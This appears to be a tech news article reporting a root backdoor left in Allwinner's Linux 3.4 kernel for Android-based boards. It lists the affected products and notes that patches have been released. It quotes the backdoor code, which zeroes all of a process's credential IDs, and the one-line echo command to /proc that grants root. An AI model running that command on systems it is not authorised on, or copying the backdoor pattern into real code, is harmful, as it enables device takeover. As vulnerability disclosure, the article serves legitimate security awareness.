You know that debug mode you wrote? You forgot to delete it
A root backdoor for debugging Android gadgets managed to end up in shipped firmware – and we’re surprised this sort of colossal blunder doesn’t happen more often.
The howler is the work of Chinese ARM SoC-maker Allwinner, which wrote its own kernel code underneath a custom Android build for its devices.
Its Linux 3.4-based kernel code, on Github here, contains what looks to The Register like a debug mode the authors forgot to kill.
cred = (struct cred *)__task_cred(current);
cred->uid = 0;
cred->gid = 0;
cred->suid = 0;
cred->euid = 0;
cred->euid = 0;
cred->egid = 0;
cred->fsuid = 0;
cred->fsgid = 0;
printk(“now you are rootn”);
While it’s a legacy kernel, “tkaiser”, a moderator over at the forums of the Armbian operating system (a Linux disto for ARM-based development boards) notes there’s a number of vulnerable systems in the field.
As tkaiser writes: “echo “rootmydevice” > /proc/sunxi_debug/sunxi_debug” from any process with any UID will get root, and it’s probably remotely exploitable if “combined with networked services that might allow access to /proc”.
He adds: “This security flaw is currently present in every OS image for H3, A83T or H8 devices that rely on Kernel 3.4”.
As well as all Orange Pi images except for Armbian’s freshly-patched 5.10, these include ARM breadboards from FriendlyARM, SinoVoip (its M2+ and M3 Banana Pi boards), Cubietruck, LinkSprite’s pcDuino8 Uno, and Orange Pi.
There are probably other products out there using the Allwinner SoC as a cheap replacement for Broadcom devices.
Tkaiser pointed out that FriendlyARM was also quick to issue a patch. ®
Rise of the machines